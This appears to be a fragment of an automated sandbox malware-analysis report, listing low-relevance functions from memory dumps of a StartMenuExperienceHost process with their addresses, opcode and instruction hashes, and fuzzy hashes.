                                                          • API String ID:
                                                          • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction ID: c531f77634975bc310436c48fc837b1c1b2f4f8c5ad12992dbae50807da4d354
                                                          • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction Fuzzy Hash: 95D0A930229A4E8FDA00B778C88A8247BA0FB0F214FCA10E1E008C71B2D60888A98700
                                                          Function 00007FFD9B7ADE78 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec50c2690805efd610205068e9c3666e32cb9877ae0f2e6b1f388e07eedf2dd4
                                                          • Instruction ID: 403ca7bfa9161b6979fc50fc33bbdc22017d589816ee0d691c99e9919a7102a3
                                                          • Opcode Fuzzy Hash: ec50c2690805efd610205068e9c3666e32cb9877ae0f2e6b1f388e07eedf2dd4
                                                          • Instruction Fuzzy Hash: 21D0A77594E9844FCB5A9735C8A8C507F50EF6B21034540ECC00A8F1B3D925CD49C700
                                                          Function 00007FFD9B796E10 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B794000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B794000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b794000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 104acc72f31d9d09c7afd7aed4cdc5b30d692872643904b6d98eec7ee4f3d1b7
                                                          • Instruction ID: cc7bac2f6e103f3872257f5e93697b5c0beaa2769d3d0bda17c019a4cde01744
                                                          • Opcode Fuzzy Hash: 104acc72f31d9d09c7afd7aed4cdc5b30d692872643904b6d98eec7ee4f3d1b7
                                                          • Instruction Fuzzy Hash: EAC04C11B5A96E06E67872B935921E8B040DB49210B461AF9E41CD71A6EC8D5E9102C5
                                                          Function 00007FFD9B7706AD Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction ID: 31e668ce6111303d3c648c45381bfc4cd6f488d9990d3e3ae62346c21e55579d
                                                          • Opcode Fuzzy Hash: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction Fuzzy Hash: 99C00205F5B75F01E86571AA58B60AEB140DBC4A25F921273D50D821B1988E22D54196
                                                          Function 00007FFD9B7712D8 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction ID: 014d798b6d36322f39b9c860b9ef3808481d02ed10de65713d785253ca219bc5
                                                          • Opcode Fuzzy Hash: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction Fuzzy Hash: 15C08C3051190E8FC908EB28C88480433A0FB19200BC200D0E009C7170E259DCC2C740
                                                          Function 00007FFD9B771CF0 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6bd0e51e27cebbb50ed940f093ff9efd1b382d162c2c5dcb05f47d845c5c1fdb
                                                          • Instruction ID: 4b46869c1d81cd14e84b8823740183c91f90104ffbdd72f33958d6c1cd02e398
                                                          • Opcode Fuzzy Hash: 6bd0e51e27cebbb50ed940f093ff9efd1b382d162c2c5dcb05f47d845c5c1fdb
                                                          • Instruction Fuzzy Hash: 86C08C00F18C1E8AF32A72440432A7D0403AB80B04F808270E00FCBBCECE0C2E020287
                                                          Function 00007FFD9B7706D0 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction ID: 036e8af56f23f0f284f01f510b383e4077dfe8aa50ea0e621eed4e322330a2b4
                                                          • Opcode Fuzzy Hash: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction Fuzzy Hash: 6AB01200E5750F00E82431FA0CE20A5B040DB44110FC20271D40C411F198CD12D40282
                                                          Function 00007FFD9B772279 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction ID: aa4335d639f11fad10cfd9083291069f188472a50696d56f4d975dc6008051bc
                                                          • Opcode Fuzzy Hash: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction Fuzzy Hash: F1B09222E1A35D42F72492A084A12FA71529F44710F5AC6B2900FA74E18C682B899681